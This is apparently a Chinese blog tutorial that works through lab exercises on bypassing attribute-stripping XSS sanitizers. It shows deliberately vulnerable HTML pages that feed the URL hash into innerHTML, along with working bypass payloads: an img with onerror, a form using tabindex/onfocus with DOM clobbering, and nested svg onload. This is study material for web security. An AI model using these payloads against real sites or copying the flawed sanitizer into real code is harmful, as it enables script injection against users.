XSS绕过案例---使用<svg>或者<tabindex>

已于 2023-01-05 12:30:14 修改
阅读量280 收藏
点赞数
分类专栏: 安全 文章标签: 前端 servlet javascript
于 2022-08-05 12:43:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63069714/article/details/126175365
版权

目录

一次循环

测试结果

两次循环

绕过方法1:DOM cobbing

绕过方法2:不进循环

一次循环

<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form id=x>
        <input id=attributes>
        <input id=attributes>
    </form>
</body>
<script>
    console.info(x.attributes);
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;
 
    //这里模拟了XSS过滤的过程,方法是移除所有属性
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root); 
</script>

代码分析

   const data = decodeURIComponent(location.hash.substr(1));       #截取#号后面的值
   const root = document.createElement('div');       #创建一个div
   root.innerHTML = data;        #然后将#号后面的值赋值给div
   for (let el of root.querySelectorAll('*')) {  #选中div下面的所有子元素
       for (let attr of el.attributes) {           #获取子元素的所有属性
           el.removeAttribute(attr.name);   #删除获取到的所有属性

测试结果

我们传递了<img src=1 οnerrοr=alert(1)>

但是却发现src=1的属性被删除了,οnerrοr=alert(1)属性却还保留着,这是为什么呢?我们先了解一下这里的删除顺序。我们使用断点调试测试它的顺序

我们先一步步调试查看值的情况,通过断点调试,我们发现src作为第一个属性进入后被删除了,剩下的属性onerror仅一位,但是循环次数大于字符串个数时就不能删除了属性了。

我们使用一个python代码测试删除元素的顺序:

我们发现在a数组下,我们仅取出来了3个值,在预期中我们应该取出6个值,这就是应该边循环边删除的原因造成的。 

这就有很大的问题,因为删除元素时因为索引问题我们不清楚到底删除了哪些元素,所以我们仅需要进行多次尝试就可以绕过一次循环:

<img test=aaa src=1 title=bbb οnerrοr=alert(1)>

两次循环

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1));;
    const root = document.createElement('div');
    root.innerHTML = data;
   
    // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
    for (let el of root.querySelectorAll('*')) {
     let attrs = [];
     for (let attr of el.attributes) {
      attrs.push(attr.name);
     }
     for (let name of attrs) {
      el.removeAttribute(name);
     }
    }    
     document.body.appendChild(root); 
</script>
</html>

两次循环的题是将属性先放入一个数组里面再进行删除,这个时候就不存在一次循环的问题。

所以我们使用两种方法进行绕过。

绕过方法1:DOM cobbing

将进入循环的东西不放入我们需要的代码,这样即使删除了也没有关系

那我们如果让没有用到的属性进入循环,需要的又没有进入循环呢?

tabindex:全局属性,指示其元素是否可以聚焦,以及它是否在何处参与顺序键盘导航。使用Tab键获取焦点。

<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true"><input name=attributes><input name=attributes></form>

 这样就是将<form%20 tabindex=1 οnfοcus="alert(1);this.removeAttribute('onfocus'); "autofocus="true">进行了触发,删除的是后面的<input>里面的属性

绕过方法2:不进循环

<svg><svg/οnlοad=alert(1)>

为什么一个<svg>没有成功,两个就成功了?--- 它可以在过滤代码执行以前,提前执行恶意代码。

        svg标签会阻塞DOM的构造。JS环境里对DOM操作又会导致回流,为DOM树构造造成额外影响。在script标签内的JS执行完毕以后,DOM树才会构建完成,接着才会加载后面的内容,然后发现加载内容出错才会触发error事件。

就是恶意代码还没有进入循环就已经执行了,所以后面无论进不进循环都没有什么意义了。

努力学IT的小徐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS练习---一次循环和两次循环问题
qq_52016943的博客
08-02 285
XSS
渗透测试基础-XSS漏洞简析
学习、分享、交流
05-17 5029
XSS原理:我们在一个网站上,输入【前端代码】,如果这个网站将我们的前端代码执行了,那么就说明这儿存在XSS漏洞。
XSS常用标签
weixin_47306547的博客
09-17 2870
目录 XSS常用标签 < script> < img > < input > < details> < svg > < select > < iframe > < video> < audio > < body > XSS常用标签 <script> alert("xss"); </script> <img src=1 one...
WEB系列(二)-----------XSS
weixin_41748164的博客
02-19 370
XSS原理及基础 定义 恶意攻击者会往Web页面里插入JS代码,当用户点击网页时.镶嵌的JS代码就会执行,从而达到恶意的特殊目的. 分类 存储型 反射型 DOM型 存储型XSS原理 攻击者在页面上插入XSS代码,服务端将数据存入数据库当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果. 可能存在的位置:一切用户可以输入的位置 ...
xss其他标签下的js用法总结大全
binggoogle的专栏
07-25 6067
xss其他标签下的js用法总结大全 https://www.91ri.org/16155.html 前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为 实际上我们的测试语句可能为↓ alert("90sec") 也就是说js语句实际上是位于↓ 的中间。 包括、、、、、、标签等情况下的xss构造。 所以我们就需要了解各种标签下的js用法,不然很多时候不可以使用就很麻
xss漏洞-svg标签】详解svg标签+触发XSS
06-29 6510
svg标签的触发与实战】
svgxss
'123'\x22
11-19 269
利用SVG进行XSS和XXE
weixin_50464560的博客
03-30 7485
最近我学习了一些新的xss技巧在这里分享给大家! 0x01 JavaScript without parentheses using DOMMatrix 背景 以前我们有两个解决xss不带括号的方法但是都有缺陷: 我们可以使用location=name来加载外部的代码,但是Safari不支持,另外还可以用οnerrοr=alert;throw 1来实现xss,但是现在大多数的waf都会过滤throw 1,因此今天我们就来介绍以下第三种方法。 DOMMatrix 题目的伪代码: 根据上面的要求我们不能使用"’
SVG格式进行xss与xxe
yggcwhat
08-14 1288
SVG格式进行xss与xxe
WEB攻防-XSS跨站&HTML&SVG&PDF&Flash&MXSS&UXSS&配合上传&文件添加脚本
siu~
09-08 485
1、XSS跨站-MXSS&UXSS 2、XSS跨站-SVG制作&配合上传 3、XSS跨站-PDF制作&配合上传 4、XSS跨站-SWF制作&反编译&上传
vue-svg-transition:创建由SVG驱动的2状态过渡
05-17
vue-svg转换 创建由SVG驱动的2状态动画图标 受启发 快速开始 npm install --save vue-svg-... < MyIcon xss=removed> < MyOtherIcon> </ svg-transition > </ template> < script > import MyIcon
v-svg-icons-website-server:VueJS的SVG图标
05-25
v-svg-icons VueJS的SVG图标。 入门 这些说明将使您在本地计算机上启动并运行该组件。 正在安装 ...< icon xss=removed> 您可以像示例中一样指定宽度和高度值。 所有图标的默认宽度和高度值为50px。
xss-filter-spring-boot-starter:springboot自动xss
05-17
<artifactId>xss-filter-spring-boot-starter</artifactId> <version>0.0.1</version> </dependency> 目前支持3种入参数xss过滤 @RequestMapping("/test1") public String test1(String name) { log.error("name...
第十二节 XSS 过滤器绕过-01
09-15
第十二节 XSS 过滤器绕过-01
v-svg-icons:VueJS的SVG图标
05-21
v-svg-icons VueJS的SVG图标。 入门 这些说明将使您在本地计算机上启动并运行该组件。 正在安装 ...< icon xss=removed> 您可以像示例中一样指定宽度和高度值。 所有图标的默认宽度和高度值为50px。
[理论-学习]Web安全-XSS-基础08
3hex的博客
08-27 508
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: XSS Challenges Stage #4:http://xss-quiz.int21h.jp/, Firefox浏览器,BurpSuite 一、概述 隐藏提交参数中的XSS。 二、表单隐藏域和SVG 隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。当表单被提交时,隐藏域就会将信息用你设置时定义的名标和值发送到服务器上。...
XSS高级 svg 复现一个循环问题以及两个循环问题
ikta的博客
08-06 884
再走一步,走到img了,显示打印alert(1)但还没弹窗,很明显js把dom树阻塞了,js执行完毕,img才开始执行,意味着img标签逃不过js的过滤。下面是remove,把src属性移除掉,onerror属性向前移一位,然后索引因为没有下一位了,所以循环结束,onerror属性也就留了下来。关键的是去看img中的attributes,有两个属性,一个src,一个onerror,看上去像数组一样的一个东西,有索引0和索引1。可以很明显的看到,最外层的是svg0,除了外层,里面的是svg2和svg1。...
XSS漏洞
weixin_38748673的博客
06-25 236
将JavaScript代码添加到客户端的方法是把它放置在伪协议说明符JavaScript:后的url中,这个特殊的协议类型声明了url的主体是任意的JavaScript代码,它由JavaScript的解释器运行,如果JavaScript:url中的JavaScript代码含有多个语句,必须使用分号将这些语句分隔开。是为了解决传统的字符编码方案的局限而产生的,他的每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。嵌入的表达式会被计算并通常连接到周围的文本中。
关于对XSS原理分析与绕过总结
最新发布
stopys6的博客
10-08 2019
如果服务器与客户端之间要传输某个特殊字符,像是<>,'等这类会被当做标签或者属性值等来解析的字符,为了避免歧义就需要使用到HTML实体化编码来进行编码了。Q2、HTML编码的几种方式别名形式:因为比较多可以见HTML 字符实体 (w3school.com.cn)十六进制:像就会被编码为<div>十进制:上述标签在十进制会被编码为<div>Q3、为什么需要JavaScript解码?通过JavaScript编码,可以对特殊字符进行转义,防止数据在传输过程中产生语法错误或安全漏洞。
<div class="layui-tab" lay-filter="test-handle" lay-allowclose="true" id="content"> <div class="layui-btn addContent" lay-active="addContent">添加创意包</div> <ul class="layui-tab-title" style="width: 85%"> <li class="layui-this" lay-id="1">创意包1</li> <li lay-id="2">创意包2</li> </ul> <div class="layui-tab-content"> <div class="layui-tab-item layui-show"> <div class="layui-tab" lay-filter="test-handle" lay-allowclose="true" id="content"> <ul class="layui-tab-title" style="width: 85%"> <li class="layui-this" lay-id="1">标题1</li> <li lay-id="2">标题2</li> </ul> <div class="layui-tab-content"> <div class="layui-tab-item layui-show">内容-1</div> <div class="layui-tab-item">内容-2</div> </div> </div> </div> <div class="layui-tab-item">主体-2</div> </div> </div>在laravel7.0框架里怎么优化这段代码
06-03
<div class="layui-btn addContent" lay-active="addContent">添加创意包</div> <ul class="layui-tab-title" style="width: 85%"> @foreach ($titles as $title) <li class="{{ $loop->first ? 'layui-this' : ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

努力学IT的小徐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值